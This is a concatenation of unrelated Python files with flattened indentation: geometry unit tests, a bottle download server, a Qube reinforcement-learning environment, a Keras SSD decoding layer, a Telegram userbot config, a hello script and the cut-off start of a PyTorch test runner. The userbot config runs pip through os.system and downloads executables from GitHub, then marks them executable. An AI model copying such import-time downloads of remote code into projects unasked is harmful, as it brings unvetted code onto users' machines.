self.assertEqual(z, Rectangle(0, 0, 300, 300))
def test_width(self):
x = Rectangle(20, 30, 80, 70)
self.assertEqual(x.width(), 60)
class SizeUnitTests(unittest.TestCase):
def test_constructor(self):
sz_default = Size()
self.assertEqual(sz_default.cx, 0)
self.assertEqual(sz_default.cy, 0)
sz_a = Size(10, 25)
sz_b = Size(cy=25, cx=10)
self.assertEqual(sz_a, sz_b)
def test_operator_eq(self):
sz1 = Size(135, 135)
sz2 = Size(135, 135)
self.assertTrue(sz1 == sz2)
self.assertFalse(sz1 is sz2)
def test_operator_neq(self):
sz1 = Size(111, 111)
sz2 = Size(222, 222)
self.assertTrue(sz1 != sz2)
def test_operator_add_eq(self):
x = Size(100, 100)
y = Size(50, 25)
x += y
self.assertEqual(x, Size(150, 125))
self.assertEqual(y, Size(50, 25))
def test_operator_sub_eq(self):
x = Size(100, 100)
y = Size(50, 25)
x -= y
self.assertEqual(x, Size(50, 75))
self.assertEqual(y, Size(50, 25))
def test_operator_add(self):
x = Size(100, 100)
y = Size(50, 25)
z = x + y
self.assertEqual(x, Size(100, 100))
self.assertEqual(y, Size(50, 25))
self.assertEqual(z, Size(150, 125))
def test_operator_sub(self):
x = Size(100, 100)
y = Size(50, 25)
z = x - y
self.assertEqual(x, Size(100, 100))
self.assertEqual(y, Size(50, 25))
self.assertEqual(z, Size(50, 75))
unittest.main()
|
"""
WSGI file used for bottle interface.
"""
import sys
import os
from os.path import abspath, dirname
import bottle
import ctools.dbfile
import s3_gateway
import s3_reports
DBREADER_BASH_FILE = os.path.join(os.getenv('HOME'), 'dbreader.bash')
try:
dbreader = ctools.dbfile.DBMySQLAuth.FromEnv( DBREADER_BASH_FILE )
except FileNotFoundError:
dbreader = None
@bottle.route('/ver')
def func_ver():
"""Demo for reporting python version. Allows us to validate we are using Python3"""
return bottle.template("Python version {{version}}", version=sys.version)
@bottle.route('/hello/<name>')
def func_hello(name):
"""Demo for testing bottle parameter passing"""
return bottle.template('<b>Hello {{name}}</b>! Running Python version {{version}}',
name=name, version=sys.version)
@bottle.route('/test_template')
def func_test_template():
"""Testpoint for testing template without using S3"""
prefix = 'a/b/c/d/e/f'
path = ''
paths = []
for part in prefix.split('/'):
path += part + '/'
paths.append((path, part))
dirs = ['subdir1', 'subdir2']
# pylint: disable=C0301
files = [
{'a':'https://company.com/a', 'basename':'a', 'size':100, 'ETag':'n/a', 'sha2_256':'n/a', 'sha3_256':'n/a'},
{'a':'https://company.com/b', 'basename':'b', 'size':200, 'ETag':'n/a', 'sha2_256':'n/a', 'sha3_256':'n/a'}
]
return s3_gateway.S3_INDEX.render(prefix=prefix, paths=paths, files=files, dirs=dirs)
@bottle.route('/')
def func_root():
"""TODO: return a better template"""
return bottle.static_file('index.html', root=os.path.join(dirname(abspath(__file__)), 'static'))
@bottle.route('/corpora/')
def func_corpora():
"""Route https://downloads.digitalcorpora.org/corpora/ with no path"""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='corpora/', auth=dbreader)
@bottle.route('/corpora/<path:path>')
def func_corpora_path(path):
"""Route https://downloads.digitalcorpora.org/corpora/path"""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='corpora/' + path, auth=dbreader)
@bottle.route('/downloads/')
@bottle.route('/downloads/<path:path>')
def func_downloads_path(path=''):
"""Route https://downloads.digitalcorpora.org/downloads/path"""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='downloads/' + path, auth=dbreader)
@bottle.route('/robots.txt')
def func_robots():
"""Route https://downloads.digitalcorpora.org/robots.txt which asks Google not to index this."""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='robots.txt')
@bottle.route('/reports')
def func_stats():
    """Route https://downloads.digitalcorpora.org/reports to the report app."""
    return s3_reports.report_app(auth=dbreader)
@bottle.route('/reports.js')
def func_reports_js():
    """Serve the static reports.js file."""
    return bottle.static_file('reports.js', root=os.path.join(dirname(abspath(__file__)), 'static'))
@bottle.route('/reports/json/<num>')
def func_stats_json(num):
    """Route https://downloads.digitalcorpora.org/reports/json/<num> to the JSON report."""
    return s3_reports.report_json(auth=dbreader, num=num)
def app():
"""The application"""
return bottle.default_app()
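# Local-development sketch (an assumption, not part of the production WSGI
# setup): serve the app with bottle's built-in server when run directly.
if __name__ == '__main__':
    bottle.run(app=app(), host='localhost', port=8080, debug=True)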
|
"""Base code for all OpenAI Gym environments of the Qube.
This base class defines the general behavior and variables of all Qube environments.
Furthermore, this class determines whether a simulation or the hardware version of the Qube is used by initialising
the corresponding Qube class in the variable `qube`.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import gym
import numpy as np
from gym import spaces
from gym.utils import seeding
# For other platforms where it's impossible to install the HIL SDK
try:
from gym_brt.quanser import QubeHardware
except ImportError:
print("Warning: Can not import QubeHardware in qube_base_env.py")
MAX_MOTOR_VOLTAGE = 18
ACT_MAX = np.asarray([MAX_MOTOR_VOLTAGE], dtype=np.float64)
# OBS_MAX = [theta, alpha, theta_dot, alpha_dot]
OBS_MAX = np.asarray([np.pi / 2, np.pi, np.inf, np.inf], dtype=np.float64)
def normalize_angle(angle):
return angle/np.pi
class QubeBaseEnv(gym.Env):
"""Base class for all qube-based environments.
    This base class cannot be used on its own since the methods `_reward` and `_isdone` are not implemented
    here. A subclass like `QubeSwingupEnv` should be used instead.
The subclasses of this base class determine the starting point of the task (i.e. pole starts upwards), the end
points of the task (i.e. a specific angle threshold of the pole in the balance task) and also the reward
structure of the task.
Each of those subclasses holds a specific qube instantiation defined at `self.qube`. This qube instantiation
    might be an instance of the hardware interface, the ODE simulation or the Mujoco simulation (PyBullet is currently
not supported).
Every qube instantiation should implement the same methods to ensure a common behavior so that those classes are
interchangeable.
Each subclass of this base class should be used with a `with` statement to ensure that the environment is
closed correctly:
```python
import gym
    from gym_brt.envs import QubeSwingupEnv
    frequency = 250
    with QubeSwingupEnv(use_simulator=False, frequency=frequency) as env:
controller = QubeFlipUpControl(sample_freq=frequency, env=env)
for episode in range(2):
state = env.reset()
for step in range(5000):
action = controller.action(state)
state, reward, done, info = env.step(action)
```
    Alternatively, the environment can be closed manually by explicitly calling `env.close()` inside a try-finally block.
"""
def __init__(self, frequency=250, batch_size=2048, use_simulator=False, simulation_mode='ode',
integration_steps=10, encoder_reset_steps=int(1e8),):
"""Starting point for the creation of new instances of a Qube (both simulation and hardware).
Args:
frequency: Sample frequency
batch_size: Number of timesteps of a single episode
use_simulator: Specifies if a simulator should be used instead of the hardware
simulation_mode: If `use_simulator=True` this specifies the used simulator; either `ode`, `mujoco` or
`bullet`; does not affect the hardware classes
integration_steps: Number of integration steps of the simulation during a single timestep; does not affect
the hardware classes
            encoder_reset_steps: Number of timesteps after which the hardware encoders are reinitialized
"""
self.observation_space = spaces.Box(-OBS_MAX, OBS_MAX, dtype=np.float64)
self.action_space = spaces.Box(-ACT_MAX, ACT_MAX, dtype=np.float64)
        self.reward_range = (0.0, 1.0)
self._frequency = frequency
# Ensures that samples in episode are the same as batch size
# Reset every batch_size steps (2048 ~= 8.192 seconds)
self._max_episode_steps = batch_size
self._episode_steps = 0
self._encoder_reset_steps = encoder_reset_steps
if not self._encoder_reset_steps:
self._encoder_reset_steps = int(1e8)
self._steps_since_encoder_reset = 0
self._target_angle = 0
self._theta, self._alpha, self._theta_dot, self._alpha_dot = 0, 0, 0, 0
self._dtheta, self._dalpha = 0, 0
# Open the Qube: This means create the appropriate interface (simulation or hardware)
if use_simulator:
if simulation_mode == 'ode' or simulation_mode == 'euler':
# TODO: Check assumption: ODE integration should be ~ once per ms
from gym_brt.quanser import QubeSimulator
#integration_steps = int(np.ceil(1000 / self._frequency))
self.qube = QubeSimulator(
forward_model=simulation_mode,
frequency=self._frequency,
integration_steps=integration_steps,
max_voltage=MAX_MOTOR_VOLTAGE,
)
self._own_rendering = True
elif simulation_mode == 'mujoco':
from gym_brt.envs.simulation.mujoco import QubeMujoco
#integration_steps = int(np.ceil(1000 / self._frequency))
self.qube = QubeMujoco(
frequency=self._frequency,
integration_steps=integration_steps,
max_voltage=MAX_MOTOR_VOLTAGE,
)
self._own_rendering = False
elif simulation_mode == 'bullet':
from gym_brt.envs.simulation.pybullet import QubeBullet
self.qube = QubeBullet(
frequency=self._frequency,
integration_steps=integration_steps,
max_voltage=MAX_MOTOR_VOLTAGE,
)
self._own_rendering = False
else:
raise ValueError(f"Unsupported simulation type '{simulation_mode}'. "
f"Valid ones are 'ode', 'mujoco' and 'bullet'.")
else:
self.qube = QubeHardware(frequency=self._frequency, max_voltage=MAX_MOTOR_VOLTAGE)
self._own_rendering = True
self.qube.__enter__()
self.seed()
self._viewer = None
self._episode_reward = 0
@property
def frequency(self):
return self._frequency
@property
def sim(self):
try:
return self.qube.sim
except AttributeError:
raise AttributeError(f"'{self.qube}' object has no attribute 'sim'")
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close(type=type, value=value, traceback=traceback)
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _step(self, action):
led = self._led()
action = np.clip(np.array(action, dtype=np.float64), -ACT_MAX, ACT_MAX)
state = self.qube.step(action, led=led)
self._dtheta = state[0] - self._theta
self._dalpha = state[1] - self._alpha
self._theta, self._alpha, self._theta_dot, self._alpha_dot = state
def reset(self):
self._episode_reward = 0
self._episode_steps = 0
        # Occasionally reset the encoders to remove sensor drift
if self._steps_since_encoder_reset >= self._encoder_reset_steps:
self.qube.reset_encoders()
self._steps_since_encoder_reset = 0
action = np.zeros(shape=self.action_space.shape, dtype=self.action_space.dtype)
self._step(action)
return self._get_state()
def _reset_up(self):
self.qube.reset_up()
action = np.zeros(shape=self.action_space.shape, dtype=self.action_space.dtype)
self._step(action)
return self._get_state()
def _reset_down(self):
self.qube.reset_down()
action = np.zeros(shape=self.action_space.shape, dtype=self.action_space.dtype)
self._step(action)
return self._get_state()
def _get_state(self):
return np.array(
[self._theta, self._alpha, self._theta_dot, self._alpha_dot],
dtype=np.float64,
)
def _next_target_angle(self):
return 0
def _reward(self):
raise NotImplementedError
def _isdone(self):
raise NotImplementedError
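    # Subclassing sketch (hedged; `MyBalanceEnv` is a hypothetical name, the
    # concrete tasks such as QubeSwingupEnv live in gym_brt.envs):
    #   class MyBalanceEnv(QubeBaseEnv):
    #       def _reward(self):
    #           # e.g. reward closeness of the pole to upright (alpha == 0)
    #           return 1.0 - abs(self._alpha) / np.pi
    #       def _isdone(self):
    #           return self._episode_steps >= self._max_episode_steps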
def _led(self):
led = [0.0, 0.0, 0.0]
# if self._isdone(): # Doing reset
# led = [1.0, 1.0, 0.0] # Yellow
# else:
# if abs(self._alpha) > (20 * np.pi / 180):
# led = [1.0, 0.0, 0.0] # Red
# elif abs(self._theta) > (90 * np.pi / 180):
# led = [1.0, 0.0, 0.0] # Red
# else:
# led = [0.0, 1.0, 0.0] # Green
return led
def step(self, action):
self._step(action)
state = self._get_state()
reward = self._reward()
done = self._isdone()
self._episode_reward += reward
info = {
"theta": self._theta,
"alpha": self._alpha,
"theta_dot": self._theta_dot,
"alpha_dot": self._alpha_dot,
}
self._episode_steps += 1
self._steps_since_encoder_reset += 1
self._target_angle = self._next_target_angle()
return state, reward, done, info
def render(self, mode="human", width=1024, height=1024):
# TODO: Different modes
if self._own_rendering:
if self._viewer is None:
from gym_brt.envs.rendering import QubeRenderer
self._viewer = QubeRenderer(self._theta, self._alpha, self._frequency)
return self._viewer.render(self._theta, self._alpha)
else:
return self.qube.render(mode=mode, width=width, height=height)
def close(self, type=None, value=None, traceback=None):
# Safely close the Qube (important on hardware)
self.qube.close(type=type, value=value, traceback=traceback)
if self._viewer is not None:
self._viewer.close()
|
'''
A custom Keras layer to decode the raw SSD prediction output. Corresponds to the
`DetectionOutput` layer type in the original Caffe implementation of SSD.
Copyright (C) 2018 Pierluigi Ferrari
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
NOTICE: This file is a modified version by Viet Anh Nguyen (vietanh@vietanhdev.com)
'''
from __future__ import division
import numpy as np
import tensorflow as tf
import keras.backend as K
from keras.layers import Layer, InputSpec
class DecodeDetections(Layer):
'''
A Keras layer to decode the raw SSD prediction output.
Input shape:
3D tensor of shape `(batch_size, n_boxes, n_classes + 12)`.
Output shape:
3D tensor of shape `(batch_size, top_k, 6)`.
'''
def __init__(self,
confidence_thresh=0.01,
iou_threshold=0.45,
top_k=200,
nms_max_output_size=400,
coords='centroids',
normalize_coords=True,
img_height=None,
img_width=None,
**kwargs):
'''
All default argument values follow the Caffe implementation.
Arguments:
confidence_thresh (float, optional): A float in [0,1), the minimum classification confidence in a specific
positive class in order to be considered for the non-maximum suppression stage for the respective class.
A lower value will result in a larger part of the selection process being done by the non-maximum suppression
stage, while a larger value will result in a larger part of the selection process happening in the confidence
thresholding stage.
iou_threshold (float, optional): A float in [0,1]. All boxes with a Jaccard similarity of greater than `iou_threshold`
with a locally maximal box will be removed from the set of predictions for a given class, where 'maximal' refers
to the box score.
top_k (int, optional): The number of highest scoring predictions to be kept for each batch item after the
non-maximum suppression stage.
nms_max_output_size (int, optional): The maximum number of predictions that will be left after performing non-maximum
suppression.
coords (str, optional): The box coordinate format that the model outputs. Must be 'centroids'
i.e. the format `(cx, cy, w, h)` (box center coordinates, width, and height). Other coordinate formats are
currently not supported.
normalize_coords (bool, optional): Set to `True` if the model outputs relative coordinates (i.e. coordinates in [0,1])
and you wish to transform these relative coordinates back to absolute coordinates. If the model outputs
relative coordinates, but you do not want to convert them back to absolute coordinates, set this to `False`.
Do not set this to `True` if the model already outputs absolute coordinates, as that would result in incorrect
coordinates. Requires `img_height` and `img_width` if set to `True`.
img_height (int, optional): The height of the input images. Only needed if `normalize_coords` is `True`.
img_width (int, optional): The width of the input images. Only needed if `normalize_coords` is `True`.
'''
if K.backend() != 'tensorflow':
raise TypeError("This layer only supports TensorFlow at the moment, but you are using the {} backend.".format(K.backend()))
if normalize_coords and ((img_height is None) or (img_width is None)):
raise ValueError("If relative box coordinates are supposed to be converted to absolute coordinates, the decoder needs the image size in order to decode the predictions, but `img_height == {}` and `img_width == {}`".format(img_height, img_width))
if coords != 'centroids':
raise ValueError("The DetectionOutput layer currently only supports the 'centroids' coordinate format.")
# We need these members for the config.
self.confidence_thresh = confidence_thresh
self.iou_threshold = iou_threshold
self.top_k = top_k
self.normalize_coords = normalize_coords
self.img_height = img_height
self.img_width = img_width
self.coords = coords
self.nms_max_output_size = nms_max_output_size
# We need these members for TensorFlow.
self.tf_confidence_thresh = tf.constant(self.confidence_thresh, name='confidence_thresh')
self.tf_iou_threshold = tf.constant(self.iou_threshold, name='iou_threshold')
self.tf_top_k = tf.constant(self.top_k, name='top_k')
self.tf_normalize_coords = tf.constant(self.normalize_coords, name='normalize_coords')
self.tf_img_height = tf.constant(self.img_height, dtype=tf.float32, name='img_height')
self.tf_img_width = tf.constant(self.img_width, dtype=tf.float32, name='img_width')
self.tf_nms_max_output_size = tf.constant(self.nms_max_output_size, name='nms_max_output_size')
super(DecodeDetections, self).__init__(**kwargs)
def build(self, input_shape):
self.input_spec = [InputSpec(shape=input_shape)]
super(DecodeDetections, self).build(input_shape)
def call(self, y_pred, mask=None):
'''
Returns:
3D tensor of shape `(batch_size, top_k, 6)`. The second axis is zero-padded
to always yield `top_k` predictions per batch item. The last axis contains
the coordinates for each predicted box in the format
`[class_id, confidence, xmin, ymin, xmax, ymax]`.
'''
#####################################################################################
# 1. Convert the box coordinates from predicted anchor box offsets to predicted
# absolute coordinates
#####################################################################################
# Convert anchor box offsets to image offsets.
cx = y_pred[...,-12] * y_pred[...,-4] * y_pred[...,-6] + y_pred[...,-8] # cx = cx_pred * cx_variance * w_anchor + cx_anchor
cy = y_pred[...,-11] * y_pred[...,-3] * y_pred[...,-5] + y_pred[...,-7] # cy = cy_pred * cy_variance * h_anchor + cy_anchor
w = tf.exp(y_pred[...,-10] * y_pred[...,-2]) * y_pred[...,-6] # w = exp(w_pred * variance_w) * w_anchor
h = tf.exp(y_pred[...,-9] * y_pred[...,-1]) * y_pred[...,-5] # h = exp(h_pred * variance_h) * h_anchor
# Convert 'centroids' to 'corners'.
xmin = cx - 0.5 * w
ymin = cy - 0.5 * h
xmax = cx + 0.5 * w
ymax = cy + 0.5 * h
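        # Worked example: (cx, cy, w, h) = (0.5, 0.5, 0.2, 0.4) decodes to the
        # corners (xmin, ymin, xmax, ymax) = (0.4, 0.3, 0.6, 0.7).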
# If the model predicts box coordinates relative to the image dimensions and they are supposed
# to be converted back to absolute coordinates, do that.
def normalized_coords():
xmin1 = tf.expand_dims(xmin * self.tf_img_width, axis=-1)
ymin1 = tf.expand_dims(ymin * self.tf_img_height, axis=-1)
xmax1 = tf.expand_dims(xmax * self.tf_img_width, axis=-1)
ymax1 = tf.expand_dims(ymax * self.tf_img_height, axis=-1)
return xmin1, ymin1, xmax1, ymax1
def non_normalized_coords():
return tf.expand_dims(xmin, axis=-1), tf.expand_dims(ymin, axis=-1), tf.expand_dims(xmax, axis=-1), tf.expand_dims(ymax, axis=-1)
xmin, ymin, xmax, ymax = tf.cond(pred=self.tf_normalize_coords, true_fn=normalized_coords, false_fn=non_normalized_coords)
# Concatenate the one-hot class confidences and the converted box coordinates to form the decoded predictions tensor.
y_pred = tf.concat(values=[y_pred[...,:-12], xmin, ymin, xmax, ymax], axis=-1)
#####################################################################################
# 2. Perform confidence thresholding, per-class non-maximum suppression, and
# top-k filtering.
#####################################################################################
batch_size = tf.shape(input=y_pred)[0] # Output dtype: tf.int32
n_boxes = tf.shape(input=y_pred)[1]
n_classes = y_pred.shape[2] - 4
class_indices = tf.range(1, n_classes)
# Create a function that filters the predictions for the given batch item. Specifically, it performs:
# - confidence thresholding
# - non-maximum suppression (NMS)
# - top-k filtering
def filter_predictions(batch_item):
# Create a function that filters the predictions for one single class.
def filter_single_class(index):
# From a tensor of shape (n_boxes, n_classes + 4 coordinates) extract
# a tensor of shape (n_boxes, 1 + 4 coordinates) that contains the
                # confidence values for just one class, determined by `index`.
confidences = tf.expand_dims(batch_item[..., index], axis=-1)
class_id = tf.fill(dims=tf.shape(input=confidences), value=tf.cast(index, dtype=tf.float32))
box_coordinates = batch_item[...,-4:]
single_class = tf.concat([class_id, confidences, box_coordinates], axis=-1)
# Apply confidence thresholding with respect to the class defined by `index`.
threshold_met = single_class[:,1] > self.tf_confidence_thresh
single_class = tf.boolean_mask(tensor=single_class,
mask=threshold_met)
# If any boxes made the threshold, perform NMS.
def perform_nms():
scores = single_class[...,1]
# `tf.image.non_max_suppression()` needs the box coordinates in the format `(ymin, xmin, ymax, xmax)`.
xmin = tf.expand_dims(single_class[...,-4], axis=-1)
ymin = tf.expand_dims(single_class[...,-3], axis=-1)
xmax = tf.expand_dims(single_class[...,-2], axis=-1)
ymax = tf.expand_dims(single_class[...,-1], axis=-1)
boxes = tf.concat(values=[ymin, xmin, ymax, xmax], axis=-1)
maxima_indices = tf.image.non_max_suppression(boxes=boxes,
scores=scores,
max_output_size=self.tf_nms_max_output_size,
iou_threshold=self.iou_threshold,
                                                              name='non_maximum_suppression')
maxima = tf.gather(params=single_class,
indices=maxima_indices,
axis=0)
return maxima
def no_confident_predictions():
return tf.constant(value=0.0, shape=(1,6))
single_class_nms = tf.cond(pred=tf.equal(tf.size(input=single_class), 0), true_fn=no_confident_predictions, false_fn=perform_nms)
# Make sure `single_class` is exactly `self.nms_max_output_size` elements long.
padded_single_class = tf.pad(tensor=single_class_nms,
paddings=[[0, self.tf_nms_max_output_size - tf.shape(input=single_class_nms)[0]], [0, 0]],
mode='CONSTANT',
constant_values=0.0)
return padded_single_class
# Iterate `filter_single_class()` over all class indices.
filtered_single_classes = tf.map_fn(fn=lambda i: filter_single_class(i),
                                                elems=class_indices,
dtype=tf.float32,
parallel_iterations=128,
back_prop=False,
swap_memory=False,
infer_shape=True,
name='loop_over_classes')
# Concatenate the filtered results for all individual classes to one tensor.
filtered_predictions = tf.reshape(tensor=filtered_single_classes, shape=(-1,6))
# Perform top-k filtering for this batch item or pad it in case there are
# fewer than `self.top_k` boxes left at this point. Either way, produce a
# tensor of length `self.top_k`. By the time we return the final results tensor
# for the whole batch, all batch items must have the same number of predicted
# boxes so that the tensor dimensions are homogenous. If fewer than `self.top_k`
# predictions are left after the filtering process above, we pad the missing
# predictions with zeros as dummy entries.
def top_k():
return tf.gather(params=filtered_predictions,
indices=tf.nn.top_k(filtered_predictions[:, 1], k=self.tf_top_k, sorted=True).indices,
axis=0)
def pad_and_top_k():
padded_predictions = tf.pad(tensor=filtered_predictions,
paddings=[[0, self.tf_top_k - tf.shape(input=filtered_predictions)[0]], [0, 0]],
mode='CONSTANT',
constant_values=0.0)
return tf.gather(params=padded_predictions,
indices=tf.nn.top_k(padded_predictions[:, 1], k=self.tf_top_k, sorted=True).indices,
axis=0)
top_k_boxes = tf.cond(pred=tf.greater_equal(tf.shape(input=filtered_predictions)[0], self.tf_top_k), true_fn=top_k, false_fn=pad_and_top_k)
return top_k_boxes
# Iterate `filter_predictions()` over all batch items.
output_tensor = tf.map_fn(fn=lambda x: filter_predictions(x),
elems=y_pred,
dtype=None,
parallel_iterations=128,
back_prop=False,
swap_memory=False,
infer_shape=True,
name='loop_over_batch')
return output_tensor
    def compute_output_shape(self, input_shape):
        batch_size, n_boxes, last_axis = input_shape
        return (batch_size, self.top_k, 6) # Last axis: (class_ID, confidence, 4 box coordinates)
def get_config(self):
config = {
'confidence_thresh': self.confidence_thresh,
'iou_threshold': self.iou_threshold,
'top_k': self.top_k,
'nms_max_output_size': self.nms_max_output_size,
'coords': self.coords,
'normalize_coords': self.normalize_coords,
'img_height': self.img_height,
'img_width': self.img_width,
}
base_config = super(DecodeDetections, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
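# Usage sketch (hedged: `ssd_input` and `ssd_raw_output` are placeholder names
# for a model whose raw output matches the (batch, n_boxes, n_classes + 12)
# layout described above):
#   from keras.models import Model
#   decoded = DecodeDetections(confidence_thresh=0.5, iou_threshold=0.45,
#                              top_k=200, normalize_coords=True,
#                              img_height=300, img_width=300)(ssd_raw_output)
#   model = Model(inputs=ssd_input, outputs=decoded)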
|
import os
import sys
from telethon.sessions import StringSession
from telethon import TelegramClient
from var import Var
os.system("pip install pySmartDL")
os.system("pip install sqlalchemy==1.3.23")
from pylast import LastFMNetwork, md5
from logging import basicConfig, getLogger, INFO, DEBUG
from distutils.util import strtobool as sb
from pySmartDL import SmartDL
from dotenv import load_dotenv
import asyncio
import pylast
from requests import get
import time
Lastupdate = time.time()
os.system("pip install --upgrade pip")
if Var.STRING_SESSION:
session_name = str(Var.STRING_SESSION)
bot = TelegramClient(StringSession(session_name), Var.APP_ID, Var.API_HASH)
else:
session_name = "startup"
bot = TelegramClient(session_name, Var.APP_ID, Var.API_HASH)
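# Startup sketch (hedged; the actual entrypoint lives elsewhere in this userbot):
#   bot.start()
#   bot.run_until_disconnected()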
CMD_LIST = {}
# for later purposes
CMD_HELP = {}
INT_PLUG = ""
LOAD_PLUG = {}
# PaperPlaneExtended Support Vars
ENV = os.environ.get("ENV", False)
""" PPE initialization. """
# Bot Logs setup:
if bool(ENV):
CONSOLE_LOGGER_VERBOSE = sb(os.environ.get("CONSOLE_LOGGER_VERBOSE", "False"))
if CONSOLE_LOGGER_VERBOSE:
basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=DEBUG,
)
else:
basicConfig(format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=INFO)
LOGS = getLogger(__name__)
# Check if the config was edited by using the already used variable.
# Basically, it's the 'virginity check' for the config file ;)
CONFIG_CHECK = os.environ.get(
"___________PLOX_______REMOVE_____THIS_____LINE__________", None)
if CONFIG_CHECK:
LOGS.info(
"Please remove the line mentioned in the first hashtag from the config.env file"
)
quit(1)
# Logging channel/group configuration.
BOTLOG_CHATID = os.environ.get("BOTLOG_CHATID", None)
try:
    BOTLOG_CHATID = int(BOTLOG_CHATID)
except (TypeError, ValueError):
    pass
# Userbot logging feature switch.
BOTLOG = sb(os.environ.get("BOTLOG", "True"))
LOGSPAMMER = sb(os.environ.get("LOGSPAMMER", "True"))
# Bleep Blop, this is a bot ;)
PM_AUTO_BAN = sb(os.environ.get("PM_AUTO_BAN", "True"))
# Console verbose logging
CONSOLE_LOGGER_VERBOSE = sb(os.environ.get("CONSOLE_LOGGER_VERBOSE", "False"))
# SQL Database URI
DB_URI = os.environ.get("DATABASE_URL", None)
# OCR API key
OCR_SPACE_API_KEY = os.environ.get("OCR_SPACE_API_KEY", None)
# remove.bg API key
REM_BG_API_KEY = os.environ.get("REM_BG_API_KEY", None)
# Chrome Driver and Headless Google Chrome Binaries
CHROME_DRIVER = os.environ.get("CHROME_DRIVER", None)
GOOGLE_CHROME_BIN = os.environ.get("GOOGLE_CHROME_BIN", None)
# OpenWeatherMap API Key
OPEN_WEATHER_MAP_APPID = os.environ.get("OPEN_WEATHER_MAP_APPID", None)
# Anti Spambot Config
ANTI_SPAMBOT = sb(os.environ.get("ANTI_SPAMBOT", "False"))
ANTI_SPAMBOT_SHOUT = sb(os.environ.get("ANTI_SPAMBOT_SHOUT", "False"))
# FedBan Premium Module
F_BAN_LOGGER_GROUP = os.environ.get("F_BAN_LOGGER_GROUP", None)
# Cbutton
PRIVATE_CHANNEL_BOT_API_ID = os.environ.get("PRIVATE_CHANNEL_BOT_API_ID", None)
# Heroku Credentials for updater.
HEROKU_MEMEZ = sb(os.environ.get("HEROKU_MEMEZ", "False"))
HEROKU_APP_NAME = os.environ.get("HEROKU_APP_NAME", None)
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", None)
# Youtube API key
YOUTUBE_API_KEY = os.environ.get("YOUTUBE_API_KEY", None)
# Default .alive name
ALIVE_NAME = os.environ.get("ALIVE_NAME", None)
AUTONAME = os.environ.get("AUTONAME", None)
#Autobio
AUTO_BIO = os.environ.get("AUTO_BIO", None)
# Time & Date - Country and Time Zone
COUNTRY = str(os.environ.get("COUNTRY", "India"))
TZ_NUMBER = int(os.environ.get("TZ_NUMBER", 1))
FBAN_REASON = os.environ.get("FBAN_REASON", None)
FBAN_USER = os.environ.get("FBAN_USER", None)
# Clean Welcome
CLEAN_WELCOME = sb(os.environ.get("CLEAN_WELCOME", "True"))
# Custom Module
CUSTOM_PMPERMIT = os.environ.get("CUSTOM_PMPERMIT", None)
CUSTOM_STICKER_PACK_NAME = os.environ.get("CUSTOM_STICKER_PACK_NAME", None)
CUSTOM_ANIMATED_PACK_NAME = os.environ.get("CUSTOM_ANIMATED_PACK_NAME", None)
# Pm Permit Img
PMPERMIT_PIC = os.environ.get("PMPERMIT_PIC", None)
# Gban
USER_IS = os.environ.get("USER_IS", None)
# Last.fm Module
BIO_PREFIX = os.environ.get("BIO_PREFIX", None)
DEFAULT_BIO = os.environ.get("DEFAULT_BIO", None)
LASTFM_API = os.environ.get("LASTFM_API", None)
LASTFM_SECRET = os.environ.get("LASTFM_SECRET", None)
LASTFM_USERNAME = os.environ.get("LASTFM_USERNAME", None)
LASTFM_PASSWORD_PLAIN = os.environ.get("LASTFM_PASSWORD", None)
LASTFM_PASS = pylast.md5(LASTFM_PASSWORD_PLAIN) if LASTFM_PASSWORD_PLAIN else None
if LASTFM_USERNAME and LASTFM_PASS:
lastfm = pylast.LastFMNetwork(api_key=LASTFM_API,
api_secret=LASTFM_SECRET,
username=LASTFM_USERNAME,
password_hash=LASTFM_PASS)
else:
lastfm = None
# Google Drive Module
G_DRIVE_CLIENT_ID = os.environ.get("G_DRIVE_CLIENT_ID", None)
G_DRIVE_CLIENT_SECRET = os.environ.get("G_DRIVE_CLIENT_SECRET", None)
G_DRIVE_AUTH_TOKEN_DATA = os.environ.get("G_DRIVE_AUTH_TOKEN_DATA", None)
GDRIVE_FOLDER_ID = os.environ.get("GDRIVE_FOLDER_ID", None)
TEMP_DOWNLOAD_DIRECTORY = os.environ.get("TEMP_DOWNLOAD_DIRECTORY",
"./downloads")
else:
# Put your ppe vars here if you are using local hosting
PLACEHOLDER = None
# Setting Up CloudMail.ru and MEGA.nz extractor binaries,
# and giving them correct perms to work properly.
if not os.path.exists('bin'):
os.mkdir('bin')
binaries = {
"https://raw.githubusercontent.com/yshalsager/megadown/master/megadown":
"bin/megadown",
"https://raw.githubusercontent.com/yshalsager/cmrudl.py/master/cmrudl.py":
"bin/cmrudl"
}
for binary, path in binaries.items():
downloader = SmartDL(binary, path, progress_bar=False)
downloader.start()
os.chmod(path, 0o755)
# Global Variables
COUNT_MSG = 0
USERS = {}
COUNT_PM = {}
LASTMSG = {}
SUDO_LIST = {}
ISAFK = False
AFKREASON = None
|
#!/usr/bin/env python3
import sys
assert sys.version_info >= (3,9), "This script requires at least Python 3.9"
print("Hello, World!")
print("I would like to get to know you.")
n = input("What is your name? ")
if n == "Jason":
print("What do I need to do to get an A?")
elif n == "Bob":
print("I've got a bad feeling about you.")
else:
print("I am glad to meet you, {}".format(n))
|
#!/usr/bin/env python3
import argparse
import copy
from datetime import datetime
import json
import modulefinder
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import torch
from torch.utils import cpp_extension
from torch.testing._internal.common_utils import TEST_WITH_ROCM, shell, set_cwd, FILE_SCHEMA
from torch.testing._internal.framework_utils import calculate_shards
import torch.distributed as dist
from typing import Dict, Optional, Tuple, List, Any
from typing_extensions import TypedDict
try:
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
